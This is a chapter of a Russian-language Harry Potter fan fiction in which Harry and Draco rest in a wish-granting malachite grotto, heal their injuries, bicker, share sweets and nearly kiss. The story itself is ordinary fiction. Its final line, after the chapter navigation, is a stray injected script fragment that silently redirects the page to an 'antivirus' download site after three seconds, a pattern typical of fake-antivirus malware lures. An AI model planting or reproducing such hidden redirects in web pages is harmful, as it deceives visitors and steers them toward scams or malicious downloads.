Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 8. Малахитовый грот

(Глава, в которой исполняются желания, Гарри ест пирожные, а Драко стирает)

Время бежало вперед, наполненная зеленым светом шахта все не кончалась. Воздух был таким влажным, что одежда мальчиков промокла насквозь. 

- Может быть, ты попробуешь идти сам? - спросил Гарри, убирая руку и отпуская слизеринца. Тот привалился плечом к сырой стене.

- Я не смогу сделать ни шага. У меня кружится голова.

- Да? У меня тоже, - проворчал Гарри. Его шатало так, что пришлось опуститься на колени у ручья и плеснуть в лицо водой.

- Ты сам виноват во всем, а я пострадал безвинно, - голосом мученика сказал слизеринец.

- Сколько можно повторять? – холодно поинтересовался Гарри, вставая. «Интересно, много крови я потерял до того, как перевязал руку», - отстраненно подумал он, поворачиваясь к Малфою спиной  и направляясь дальше по подземному коридору.

- Поттер! – раздался сзади голос Драко. – Не смей оставлять меня одного! Вернись немедленно!

Гарри шел, не оборачиваясь. Ему казалось, что если он остановится, то просто свалится на землю от слабости. По коридору разнесся звук шагов.

- Поттер! Мне плохо, я умираю, ты почти убил меня, а теперь заставляешь бегать за тобой… Это так на тебя похоже… Делаешь, не думая, а потом от этого страдают другие,  – прошептал Драко, нагоняя его.

- Малфой, я иду очень медленно, - сухо ответил Гарри. Слова школьного врага напомнили ему о смерти Сириуса, - бежать за мной не обязательно.

- Ну да! Медленно для тебя, может быть, - ответил слизеринец тихо. Каждое слово отдавалось эхом в голове, и его начинало подташнивать.

- Послушай, - Гарри остановился. Держась за стену, он повернулся и посмотрел на Малфоя. – Просто постарайся идти сам, ладно? Хотя бы немного, и потом я снова поведу тебя… Я себя… не очень хорошо чувствую…

- Поттер, ты сам виноват во всем, как обычно, - ответил Драко, покосившись на пропитавшуюся кровью повязку на руке гриффиндорца. Потом нарочито холодно добавил, - думай, где нам остановиться на ночлег.

- Не здесь, - коротко бросил Гарри, продолжая путь.

- Мне надо отдохнуть, - шептал Драко, плетясь сзади, - мне плохо, у меня болит живот.

Гарри молчал. Он понимал, что избил Драко, понимал, что тот будет помнить об этом до конца своей жизни, не говоря уже о путешествии. Ответить ему было нечего. Гарри был виноват, а также слаб и утомлен. Странный таинственный свет, которым сочились скользкие стены коридора, освещал путь, лента ручья обдавала холодом, становилась все шире. Сердце замирало при мысли о грядущих испытаниях. Гарри вспоминал Нору, любимые, веселые лица друзей, нежный цветочный запах Джинни, и чувствовал себя абсолютно одиноким. Почему, задавался он вопросом, никто из них не может помочь мне здесь? Чем так хорош хорек, что именно его выбрала Ничья земля?

Глубоко задумавшись, Гарри чуть не упал, споткнувшись о невысокий выступ. Туннель неожиданно кончился, открывая взгляду широкий подземный грот, разделенный пополам озером.

- Осторожней, - просипел Драко из-за спины гриффиндорца, спускаясь вслед за ним на каменную площадку капельника. Над их головами причудливой бахромой застыли сталактиты. Вода с них капала вниз, и в глубине пещеры тянулись к ним гипсовые сталагмиты, похожие на диковинные сосульки, одни совсем низкие и тонкие, другие высокие и слоистые. Некоторые срастались со сталактитами, образовывая колонны. Мальчики огляделись. Грот был наполнен зеленым свечением, исходившим от свода и сырого пола. Вверху, высоко в трещине малахитового купола был виден клочок желто-сиреневого сумрачного неба.

- Остановимся здесь, - хмуро бросил Гарри, садясь. Положив котомку рядом, он аккуратно размотал пропитавшуюся кровью повязку, с трудом отодрав прилипшую к коже ткань. Сначала легким покалыванием отозвались вырываемые волоски, а потом от боли на глаза навернулись слезы. Рука выглядела устрашающе: края раны побелели, кисть распухла.

- Малфой,  - позвал гриффиндорец своего спутника. Драко сидел, привалившись спиной к сталагмиту и обхватив руками колени. На голос Поттера он осторожно повернул голову.

 - Мне надо оторвать кусок от твоей нижней рубашки.

- Что ты так орешь? – здоровый глаз слизеринца светился негодованием, - и так голова болит.

- Малфой, небольшой кусок, перевязать руку. От моей рубашки остались одни грязные лохмотья. – Снова попросил Гарри.

- Ладно, - устало согласился Драко, не желавший больше слушать нытье очкарика, -  давай, рви.

Сидя на коленях, Гарри задрал здоровой рукой подол мантии слизеринца, обнажая острые белые колени. В другой ситуации Драко бы это взволновало, но сейчас ему было все равно. Тошнота подбиралась к горлу каждый раз, когда он шевелился, и Драко прикрыл глаза, стараясь ее унять. Гриффиндорец прижал край нижней рубашки локтем к своему бедру и рванул. Тонкая ситцевая ткань легко поддалась, и оторванным куском Гарри снова перебинтовал руку.

Замерев в прежней позе, Драко провел языком по пересохшим губам.

- Поттер, - сказал он тихо. – Дай мешок.

Гарри отвязал котомку от пояса и протянул Малфою. Тот растянул тесемки, заглядывая внутрь, и быстро вытряхнул содержимое на камни. Вслед за флягой выпала коричневая банка и разбилась.

- Мерлинова мать, - выругался Драко сквозь зубы, - это еще что за дерьмо повылазило?

Он попытался собрать мазь черепком, но она выпадала коричневыми комьями.

- Ох, Мерлин мой, - шептал слизеринец, - ведь она для чего-то нужна. Дамблдор дал нам ее не просто так.

Драко вздохнул, вытирая следы мази. Она покалывала ободранные кончики пальцев, и это казалось странно приятным. Драко с любопытством посмотрел на раны под сломанными ногтями, и с удивлением обнаружил, как рваные края стягиваются. Через несколько секунд ничто уже не напоминало о ссадинах.

- Поттер, - тихо произнес Драко, пихнув соседа в бок, и выставил перед его лицом свою руку, - взгляни-ка.

Гарри посмотрел на его пальцы. Они были белыми и тонкими, с аккуратными чуть голубоватыми от холода ногтями. Раны исчезли.

- Поттер, это заживляющее зелье, - прошептал Драко.

- Да, похоже на то, - Гарри задумчиво взглянул на руку, потом на разбитую банку.

- Давай, намажь мне скорее лицо. – Слизеринец придвинулся к Гарри, вытягивая шею, будто собирался поцеловать его. Гриффиндорец вздохнул. Малфой имел право на то, чтобы ему первому оказали помощь. Ведь Гарри был виноват в его увечьях. Наклонившись, он зачерпнул чуть-чуть, только чтобы втереть в распухшую щеку Драко, в лопнувшую кожу над бровью и на виске. Как только мазь коснулась разрывов,  они подсохли, их края срослись, а заплывший глаз открылся. Гематома исчезла, уступая место белой нежной коже, возвращая Драко прежний облик.

- Теперь помажь затылок. Там, по-моему, огромная шишка, - сказал слизеринец тихо, - только осторожно, не дави.

Гарри взял еще мази, аккуратно приподнял слипшиеся волосы, чувствуя, как горит под пальцами рана на затылке. Затем, слегка поглаживая, размазал коричневую кашицу по коже. Драко закрыл глаза, слушая шум в голове. Странная тревога охватила его, рождаясь в районе солнечного сплетения и распространяясь в легких, как веселящий газ. Едва уловимое ощущение, трепетное и хрупкое, словно он ждал какого-то внезапного чуда.

Однако Гарри убрал руку и взглянул на место, где только что синела шишка величиной с грецкий орех. Теперь ее не было.

Слизеринец выдохнул и покрутил головой.

- Невероятно! Не болит! – воскликнул он, пытаясь скрыть непонятное разочарование, - так, теперь колени.

Драко сам втер мазь, ощущая слабое жжение. Заживающие ссадины горели, затвердевая и исчезая, оставляя после себя только белую кожу.

- Вот, совсем другое дело, - радовался он.

Гарри посмотрел на разбитую банку. Мази осталось совсем немного.

- Спасибо и на этом, - пробормотал он, разматывая повязку. Бережно устроив ноющую кисть на колене, Гарри коснулся раны пальцами, густо смазанными мазью. Боль пронзила руку от ногтей до плеча. Гарри прикусил губу, не желая показывать Малфою свою слабость. Чувствуя металлический привкус крови на языке, он смотрел, как постепенно, слой за слоем: кости, ткани, кожа, заживает рука. Минута мучительного желания почесать ладонь, и вот на ней остался только небольшой шрам в виде рогатки. Драко, наблюдавший со стороны, изумленно ахнул:

- Поттер, это бесподобно!

- Да, - выдохнул Гарри с облегчением. Боль прошла, пальцы сгибались, опухоль спала. Он несколько раз сжал и разжал кулак.

- Как новая… - сказал гриффиндорец улыбаясь.

- Замечательно, - Драко был рад, что Поттер не умирает и восхищен любопытным действием зелья. Он даже хотел схватить Гарри за руку, но не стал, смутившись своего желания.

Гарри откинулся на холодный малахит, наслаждаясь ощущением в пальцах. Кожу слегка покалывало, и по мышцам разливалось тепло. Правда, мази не хватило для пореза на плече, но по сравнению с раной на ладони он был всего лишь царапиной.

Драко тоже молчал, наблюдая за Поттером, и думая о его глазах, неожиданно темных и глубоких, о взгляде, обращенном внутрь. Слизеринец снова ощутил странную тревогу, подкатившую к горлу. Руки похолодели. Драко отвернулся к подземному озеру, глядя на неподвижную воду, отражавшую клочок неба в расщелине наверху. Драко поежился. Темно-зеленая вода наводила на мысли о чем-то неприятном, о чем не хотелось вспоминать, но надо было вспомнить. Слизеринец перевел взгляд на Гарри, и тот, будто почувствовав, повернулся и улыбнулся краешками губ. Нахмурившись, Драко снова посмотрел на воду.

- Что смешного, Поттер? – спросил он, теребя край рукава.

- Нет… Ничего… - торопливо покачал головой Гарри, не способный объяснить внезапное желание подбодрить Малфоя, - кстати, у тебя мантия в крови.

Драко усмехнулся, стараясь сохранить остатки высокомерия.

- Ты лучше на себя посмотри, Поттер. На тебе вообще нет ни одной чистой тряпки, - сказал он, задрав подбородок.

-  Можно подумать – на тебе есть, - хмыкнул Гарри, все еще чувствуя слабость.

- Видишь ли, драгоценный Поттер, правда в том, что я просто аккуратней, - Малфой поковырял отросший ноготь, - прими это, как факт.

- Ладно… Считай, что принял. - Неожиданно согласился Гарри и, помолчав, добавил, - Кстати, хорошо бы постирать.

- Интересно как, если здесь нет домовых эльфов… – протянул Драко с сарказмом в голосе. Ему никогда в жизни не приходилось стирать самому, даже будучи пленником в замке Лестранжей.

- Как стирают, Малфой, - ухмыльнулся Гарри, - руками, в воде.

Скептически поджав губы, Драко осмотрел свою мантию. Потом снова перевел взгляд на гриффиндорца.

- Ах да, я и забыл, что ты у нас все умеешь. Что ты еще там делал сам, у своих злых магглов?

- Отстань, Малфой… – отмахнулся Гарри, вставая. Он быстро стянул плащ и мантию, расстегнул то, что когда-то было рубашкой, швырнув лохмотья на пол.

- Какой изысканный стриптиз, - томно протянул Драко, уставившись на покрывшуюся мурашками спину Поттера, когда тот, как обычно, проигнорировав его реплику, подошел к воде и уселся полоскать плащ.

Гарри тер пропитанную грязью и кровью ткань, и смотрел, как темные круги расходятся по воде.

- Как же я хочу, чтобы тут появился хотя бы кусок мыла! –  вздохнул он, вытирая лоб тыльной стороной ладони, и чуть не упал в воду, когда рядом с плащом на камнях из ниоткуда появилось то, о чем он просил.

- Ого! Что это там такое? – воскликнул Драко, с любопытством наблюдавший за гриффиндорцем.

- Мыло, Малфой, - не веря своим глазам, ответил Гарри.

- Как ты его сделал?! Без палочки! – воскликнул слизеринец, требовательно глядя на своего собеседника.

- Сам не знаю, - ответил Гарри пораженно.

- О, ну вот, в самый раз! – радостно сообщил Драко, - теперь ты постираешь мою мантию.

Гарри не ответил. Он вспоминал, что мог сказать или сделать, чтобы такое чудо случилось. Перебрав в голове все варианты, он, наконец, решил, что просто пожелал его, и грот выполнил желание. Гарри бросил мокрый плащ и выпрямился. Он быстро прикидывал, что же тогда следует попросить, чтобы они с Малфоем смогли постирать и высушить вещи.

- Я хочу костер, - сказал он после некоторых размышлений, но ничего не произошло.

- Какой хитрый, костер он захотел! – ядовито комментировал Драко, наблюдая за гриффиндорцем, - с тебя и мыла хватит.

Гарри бросил раздраженный взгляд в сторону Малфоя, потом снова задумался.

- Да. – Наконец произнес он, - мне нужны сухие ветки и пергамент.

Не успел гриффиндорец произнести последние слова, как охапка хвороста и толстый свиток пергамента упали к его ногам.

- Хочу, чтобы пергамент зажегся, - сказал Гарри, но снова ничего не произошло.

- Хм, - задумчиво пробормотал он, - ну хорошо, разожгу сам.

- Как? У тебя нет палочки, - посмотрев на него, как на умалишенного, напомнил слизеринец.

- Малфой… Ты слышал про трение? – снисходительно ответил Гарри, подходя с охапкой хвороста и пергаментом в руках.

- Знаю такое слово, оно звучит пошло, только при чем тут огонь, Поттер? – в голосе Драко сквозило недоумение.

- Увидишь, - коротко бросил Гарри, бросая добычу на пол.

- А теперь мне нужна веревка! – сказал он, еще немного подумав.

- Мыло уже есть… Собрался повеситься, Потти? – поинтересовался Драко.

- Не дождешься, Малфой, - хмыкнул Гарри, поворачиваясь к слизеринцу спиной. Он поднял появившийся моток бечевки и привязал ее к двум высоким сталагмитам.

 Затем гриффиндорец пошел по стене пещеры, разыскивая подходящие камни. Драко следил за ним, начиная бояться, что тот, наконец, спятил.

Однако скоро Поттер вернулся и, сложив хворост под веревкой, сел на холодный пол пещеры. 

Сжав в каждом кулаке по одному булыжнику, Гарри ударил ими друг о друга. Раз, еще раз. Драко в изумлении наблюдал за процессом. Когда искра вырвалась и подожгла пергамент, а следом загорелись сухие прутья, слизеринец охнул.

- На камнях заклятье! – протянул он, глядя на разгоравшееся пламя.

- Не думаю, - ответил Гарри, снова вставая. Теперь им было где высушить вещи, и он вернулся к оставленным на берегу мантии и плащу.

Глядя на то, как Поттер стирает, Драко обдумывал открывшиеся перспективы. Грот выполнял желания. Дал им прутья и пергамент, мыло и веревку. «Неплохо было бы сполоснуться», - подумал Драко. Ведь с того, времени, когда они искупались в море, он успел поваляться на сырой, скользкой земле, полежать на пыльном полу в крови, и посидеть на траве.

- Хочу лавандовый шампунь, полотенце, мятную зубную пасту и щетку. Еще хочу расческу и  новую мантию, - пробормотал Драко, потом снова задумался, оглядев возникшие из ниоткуда предметы.

- Хочу кровать с матрасом, одеялом и подушкой! – попросил мальчик, и к его вящему восторгу, у каменной стены появилась широкая кованая кровать, убранная голубым бельем. На ней возвышалась перина, напоминавшая слоеный торт, толстое одеяло и большая подушка.

- Ну, ничего себе! – изумленно воскликнул Гарри, повернувшись, - я тоже хочу кровать с матрасом, подушкой и одеялом!

Однако его желание было оставлено без ответа.

- Что такое!? – гриффиндорец огляделся, - почему мое желание не исполнилось?

- Может потому, что на полу тебе будет привычней? – предположил довольный Драко.

- Вот подлость… Видимо, одно и тоже нельзя загадывать дважды, - проворчал Гарри, - неужели мне опять придется спать с тобой в  одной кровати?

- Это с чего это? – поднял брови Драко, хотя по коже моментально пробежал приятный озноб, и ладони вспотели.

- С того… - мрачно ответил Гарри, переводя взгляд на аккуратно сложенные у ног Малфоя банные принадлежности.

- Ну-ка, ну-ка. – Прижимая к груди выстиранные и отжатые вещи, Гарри подошел к веревке, попутно рассматривая приобретения Драко, - а неплохо ты устроился. Но, наверное, тебе придется поделиться.

- Вот еще, - протянул слизеринец, - ты закончил? Если да, то я пойду.

- Мне только надо освежиться, - ответил Гарри.

- Но ты, конечно, не подумал, что оденешь, когда чистый вылезешь из воды, - невинно предположил Драко.

- Иногда и ты бываешь прав, Малфой, - вздохнул гриффиндорец, - хочу новую мантию.

Однако, было похоже, что и здесь Гарри опередил шустрый хорек.

- Малфой! – возмутился Гарри, но тут же добавил, - тогда давайте плащ, - тут счастье улыбнулось мальчику, и он получил новый, теплый походный плащ.

- Так нечестно! Мне он нужнее! – возмутился Драко.

- Дам поносить, - великодушно сообщил гриффиндорец. Развесив вещи, он подошел к Малфою и взял заказанные им полотенце, шампунь, щетку и пасту.

- Спасибо, что обо всем позаботился, - улыбнулся Гарри, направляясь к воде.

- Поттер! Верни сейчас же мои вещи! – крикнул ему Драко, несколько растерявшийся под натиском школьного врага, - о, мой Мерлин! Чистить зубы после тебя равносильно тому, чтобы засунуть в рот палец горного тролля!!

Однако Гарри оказался глух к речам слизеринца. Он спокойно постирал и повесил сушиться брюки, потом помылся, перевязал рану на плече, которая все еще кровотачила, и чистый, в новом плаще залез под одеяло, не забыв прихватить мешок Дамблдора. Плотная шерсть немного колола кожу, одеяло доставало до глаз, и Гарри казалось, что он сплел себе кокон. Тревожные мысли о будущих испытаниях ушли, и мальчик тихо лежал, наблюдая украдкой, как Драко встает и снимает мантию. Белые худые запястья изогнулись, быстро стягивая нижнюю рубашку. Светлые волосы исчезли в вороте, и через секунду упали на плечи. В полумраке грота мелькнули узкие угловатые бедра. Гарри вцепился в пододеяльник, не в силах отвести взгляд.

Драко собрал в охапку вещи и пошел к воде. Мальчику было немного неловко, но после купания голым в море он чувствовал себя так, словно лишился невинности. Ему уже нечего было скрывать. Драко быстро помылся, наслаждаясь запахом шампуня, и вкусом мяты во рту. Потом, причесавшись, он накинул чистую мантию, и уселся стирать. Это было не так просто. Сначала слизеринец положил рядом скомканную одежду, и задумчиво поглядел на нее. «Так… Ну что же», - вздохнул он, выуживая из кучи рваную рубашку. Плюхнув ее в холодную воду, Драко неловко потер ткань, глядя, как мыльные круги расползаются по поверхности подземного озера. «Ладно. С нее хватит», - вздохнул он, вставая и встряхивая мокрый ситец.

- Эй, Поттер! – позвал Драко в сторону кровати.

- А! – тут же откликнулся гриффиндорец, делая вид, что только поднял голову.

- Что дальше? – Драко показал ему рубашку, с которой на камни текла белесая вода.

- Прополощи еще раз и выжми, - ответил Гарри, ухмыляясь.

- Выжать?

- Да. Вот так, - Гарри поднял руки, сжимая кулаки, точно держал в них тряпку, и одну кисть повернул вперед, а вторую назад. – Понял?

- Естественно! – хмыкнул Драко, и для вида поболтав рубашку в ключевой воде, от которой уже сводило пальцы, кое-как отжал тонкий ситец и положил на полотенце. Дальше настал черед мантии. Драко встряхнул ее и окунул в воду. Неожиданно что-то белое упало рядом, и по озерной глади побежала легкая рябь. Мальчик присмотрелся и узнал цветок, подаренный ему Поттером. Снежные лепестки лежали на темной воде, словно лоскуты атласа, и внезапно мальчику стало так горько, как будто он потерял что-то по-настоящему ценное. Драко с тоской смотрел на белое пятно на волнах. Потом воровато оглянулся на гриффиндорца. Казалось, тот был занят поиском чего-то в одеяле. Он быстро повернулся и сделал шаг в воду, пытаясь поймать цветок.

Гарри поднял голову, и с удивлением увидел, что слизеринец совершает какие-то странные движения, будто пытается что-то поймать, стоя по колено в озере. Приглядевшись, он понял, что Малфой вылавливает ромашку. Сначала Гарри удивился, а потом отчего-то почувствовал неловкость. Ведь это он шутки ради подарил цветок хорьку. Когда Малфой встал, бережно разглаживая на ладони лепестки, Гарри сделал вид, что занят изучением содержимого мешка.  Слизеринец развесил плохо отжатые вещи, с которых на пол пещеры лилась вода, чуть в стороне от костра и быстро шмыгнул под одеяло, предварительно устроив цветок сушиться на камнях у огня.

Одеяло было таким большим, что мальчики разместились под ним, не касаясь друг друга. Они поели, и разомлели в тепле.

- Хочу стакан огневиски, - сказал Гарри, и в его руках тут же появился стакан с янтарной жидкостью.

- Только не выпивай все! – закричал Драко, - второго не дадут!

- Не ори, Малфой, – сосредоточенно отозвался Гарри, отпив половину одним глотком. Горло обожгло, и гриффиндорец закашлялся

- Не расплескай, - острый локоть Драко ткнул его в ребра. Слизеринец отобрал у вытиравшего слезы Гарри стакан и допил остатки.

- Фу! Ну и гадость!

- Если не нравится, мог не вырывать, - фыркнул Гарри, откашлявшись.

- Тебе жалко, что ли? – протянул Драко и вдруг широко зевнул, - хочу снова оказаться в школе.

Гарри, с трудом подавив зевок, взглянул на него:

- Зачем?

- Поттер, - пробормотал Драко вяло. Веки отяжелели. Глаза закрывались, - а как ты думаешь? Если я загадал такое желание…

- Ну… Не думаю, что грот его выполнит. – Лениво пожал плечами Гарри, поплотнее заворачиваясь в плащ. От усталости мальчика знобило.

- А вдруг…

В тишине было слышно только, как шумит где-то в подземном тоннеле невидимый ручей, и капает вода со сталактитов. «Хочу, чтобы тут появились недостающие хоркруксы», - подумал Гарри. Мысли вязли, словно мухи в киселе.

- Нет, такие желания не сбываются. – Проговорил он медленно, чувствуя, как голова неумолимо клонится на грудь.

- Да, похоже на то, - согласился Драко, погружаясь в мягкую глубину грустных и теплых сновидений. Через минуту оба мальчика спали.

 Гарри внезапно очнулся. Прямо ему в лицо светила луна, висевшая в трещине свода  над головой. Он скосил глаза вправо. Малфой сидел, обхватив руками колени и смотрел на лоскут неба. Несколько минут все еще окутанный сонной негой Гарри наблюдал за слизеринцем. Странно. Из темноты лунный свет выхватывал белую щеку Малфоя, уголок нижней губы, мягкой и влажной, и светлые ресницы, словно осыпанные серебром. Здесь, глубоко под землей, Гарри показалось, что рядом с ним находится совсем не тот человек, которого он видел на поверхности. Этот, незнакомый, был странно красивым и далеким. Тут Драко, словно почувствовав его взгляд, повернулся.

- Не спится? – спросил слизеринец нарочито безразличным тоном.

- Нет. Луна разбудила, - ответил Гарри, и его голос звучал также фальшиво.

- И меня, - отозвался Драко.

Несколько секунд мальчики молчали, глядя на темную озерную воду.

- Я умираю с голоду, - как-то преувеличенно бодро воскликнул Драко.

- Вот, на, - Гарри вытащил из-под одеяла мешок и протянул Малфою. Тот покачал головой.

 – Нет. Эта сиротская пища мне уже надоела. – Драко ласково улыбнулся своим мыслям, - Я хочу лакричных волшебных палочек, эклеров, пирожных в форме котлов, шоколадного печенья и… пирожных с кремом.

- Ого! – Гарри поднял брови, глядя на упавшие в складки пододеяльника сладости, - Малфой, ты меня удивил. Съесть одному столько сладкого – очень вредно для здоровья. Придется поделиться.

- Бери, - великодушно разрешил Драко, принимаясь за эклер, - я не жадный.

 Гарри взял пирожное с кремом.

- Что ж, спасибо.

- Не за что. Я давно не ел пирожных. – Тщательно прожевав кусок, откликнулся Драко.

- Вот как? – Гарри повернулся и внимательно посмотрел на Малфоя, - а что так? Темный Лорд сторонник здорового образа жизни?

Драко почувствовал, что все еще улыбается, но его улыбка смотрелась на лице также неуместно, как на похоронах красная шляпа. Радость исчезла, словно рядом пролетел дементор.

- Да, - выдавил он. Из подвалов памяти выбралось безобразное воспоминание, одно из тех, которые так естественно держать глубоко внутри. Он вошел в комнату, освещенную факелами в бронзовых держателях. У софы стояла тетка. Драко почему-то особенно хорошо запомнил ее белую грудь, почти выпадавшую из глубокого выреза домашней мантии. Кажется, тогда он еще подумал, что она тяжелая, как мешки с песком. Рядом стоял ее нервный бледный муж, ощупывая его взглядом пустых черных глаз, а на диване сидел Темный Лорд. Тогда, перед тем, как упасть, Драко еще запомнил пирожные в вазе на столе, и подумал, что больше никогда не возьмет их в рот.

- Что-то не так? – Гарри внимательно посмотрел на слизеринца, - Тебе не понравились мои слова про Волдеморта?

- Плевать, - выдавил Драко, неуверенно поднимая на Гарри глаза, - Просто кое-что вспомнил. Темный Лорд – не самый приятный человек, знаешь ли. – Драко усмехнулся, поражаясь своей невиданной смелости. Шутить о Волдеморте. За такие шутки можно легко проститься с жизнью.

- Знаю, вот только он не человек, - с горькой усмешкой ответил Гарри. Казалось, сейчас они с Малфоем действительно поняли друг друга.

Драко посмотрел на него и на какое-то безумное мгновение представил себе, что они под одеялом вместе. Не просто греются, а по-настоящему вместе, словно между ними уже было что-то серьезное. От этих мыслей Драко стало неловко и больно, и, делая над собой усилие, стараясь затоптать внутри разраставшееся чувство утраты, он усмехнулся.

- А интересно, такое желание Грот выполнит: хочу, чтобы у Поттера выросли рога.

И тут, как не противоречило это усвоенной ими логике пещеры, голову Гарри украсили ветвистые рога, как у его отца в анимагической форме.

- Малфой! – Гарри в ярости уставился на слизеринца, - ты с ума сошел? А если я таким и останусь?

- Ну что ж, тебе идет, - Драко пожал плечами с невинным видом.

- Что?! – Гарри с ненавистью уставился на Малфоя, - тогда хочу, чтобы у Малфоя выросли ослиные уши.

Секунда, и из волос Драко проклюнулись два мягких серых уха, и вытянувшись вверх, свесились мохнатыми кончиками.

- Эй! – воскликнул слизеринец, почему-то не подумавший об ответной реакции соседа, - тогда пусть в очках Поттера исчезнут стекла!

Гарри схватился за очки, от которых осталась одна оправа. Все вокруг расплылось.

- Ха-ха, Поттер, такой беспомощный! – ликовал Драко, ощупывая уши.

Они начали желать друг другу все новые и новые «украшения», и постепенно вошли во вкус, особенно когда увидели, что предыдущие быстро исчезают. Гарри пожелал слизеринцу нос до пола, и Драко чуть не свалился с кровати, и в ответ наградил Поттера третьей рукой. Гарри подарил ему кустистые черные брови, а Драко в ответ – россыпь вонючих бородавок. Скоро мальчики не могли дышать от хохота.

Когда фантазия иссякла, они все еще вытирали слезы смеха, и Гарри вдруг так ясно осознал, что им обоим всего навсего семнадцать лет. А они уже успели забыть об этом. Стало до слез жалко себя и Малфоя. Ведь несмотря на недетские задачи, которые возложили на них, они все еще решали проблемы юности, такие естественные для мальчишек во всем мире. Гарри впервые подумал, что здесь, на Ничьей земле, он вдруг снова почувствовал себя семнадцатилетним, далеким от глобальных проблем  и спасения мира. Малфой с его вечными остротами, их школьная вражда вдруг снова вернула ему детство.

А Драко перестал смеяться. «Хочу, чтобы Поттер поцеловал меня», - подумал он, хоть и знал, что такие желания не исполняются. Но Гарри вдруг повернулся к нему, такой как обычно, без рогов и бородавок.

Гриффиндорец смотрел на чуть приоткрытые губы Драко, неожиданно осознав, что сидит к нему совсем близко. Несколько сантиметров вправо, и Гарри поцелует его. В паху стало горячо. Еще немного, он наклонился, но внезапно вздрогнул и отпрянул. Драко моргнул, облизав губы, и поднял голову к клочку неба высоко над головой. Гриффиндорец тоже.

- Малфой, что ты там говорил о спасении? От кого тебя надо спасать? – спросил Гарри, лишь бы что-то сказать.

- Я пошутил, Потти, - ответил Драко, усмехаясь и надеясь, что выглядит убедительно, - не терпится показать, какой ты герой, верно?

- Нет, но… - Гарри раздраженно покачал головой, - ладно. Не хочешь говорить – не надо.

Слизеринец вздохнул. Снова посмотрел на звезды. Он вспомнил, как Поттер спрашивал о разговоре тетки и Снейпа. «А почему бы не рассказать, если ему так надо?» - вдруг спросил внутренний голос, - «ведь ты же хотел ему понравиться, вот и сделаешь что-то приятное».

- А знаешь, Поттер, - заговорил Драко, - моя любимая тетушка Беллатрикс рассказывала Снейпу, что по поручению Лорда хранит у себя в замке… что-то… то ли сосуд, то ли кубок. В общем, какую-то ерунду. Вот о чем они говорили,  Поттер, все довольно невинно.

- И что? – поднял брови Гарри.

- Ты хотел знать, вот я и сказал тебе, разве не ясно? – Драко томно вздохнул, обнимая подушку.

- Ну… Может тогда ты расскажешь, где видел Волдеморта? – поинтересовался Гарри.

- Ты не знаешь, когда остановиться! – покачал головой слизеринец,- хватит откровений на сегодня.

- Ладно… Спасибо и на этом…

- Не стоит благодарности. Потом тебе придется расплатиться, разумеется, - Драко зевнул, закрывая глаза.

Тут костер, любовно разведенный Гарри, вспыхнул последний раз и растворился в воздухе без следа.

- Куда он делся? – пораженно воскликнул Драко, требовательно глядя на соседа.

- Не знаю… - Гарри пожал плечами, - может… исчез?

- Я и без тебя вижу, - с досадой отмахнулся слизеринец. Теперь пещеру наполнял только зеленый свет, источаемый стенами, и неверный свет луны, лежавший на полу бледно-желтым пятном.

- Малфой, а что, если сейчас и веревка пропадет? – предположил Гарри.

- Думаешь? – с сомнением поглядел на него Драко, - видимо, тогда лучше снять вещи от греха подальше…

- Да, так будет лучше, - ответил Гарри, снова вставая, и возвращаясь обратно с их одеждой.

- Значит, моя новая великолепная мантия тоже скоро исчезнет, - сокрушался Драко, ласково поглаживая бархатную ткань.

- И не только… Кровать тоже пропадет, - плотнее кутаясь в одеяло, сообщил Гарри.

- Но это случится не так быстро, верно? – поднял брови Драко. Странная улыбка заиграла на его бледном лице.

- Верно, - ответил Гарри, улыбаясь, - может быть, мы даже успеем еще поспать.

 - Да. Надо бы… Но мне почему-то не хочется, - пожал плечами Драко.

- Да, мне тоже. Давай оденемся и, наверное, нам лучше лечь на полу, - сказал Гарри, -кровать может исчезнуть, когда мы будем спать.

Пока они одевались, и укладывались на полу, перед глазами Драко скользили картинки той ночи, когда он услышал разговор Белатрикс и Снейпа. Тогда к его камере подошел Рудольф Лестранж, и замер, глядя на Драко безжизненными, словно обращенными в себя, глазами. Мальчик не знал, куда деваться от этого взгляда. Он сидел, прижавшись спиной к стене, и старался не обращать внимания на худощавую нервную фигуру  у дверей. Однако тут раздались быстрые уверенные шаги, и появилась тетка.

- Оставь его. Я обещала Нарциссе, - глухо сказала она. Рудольф что-то прошептал ей на ухо. Она тяжело кивнула, и муж исчез, словно его и не было. Белатрикс бросила взгляд на Драко, а потом вдруг сорвалась с места, увидев кого-то у входа в подземелья.

Тогда он услышал обрывки разговора. Его тетка говорила так, словно наконец получила доказательства своего превосходства над Снейпом в глазах Хозяина.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>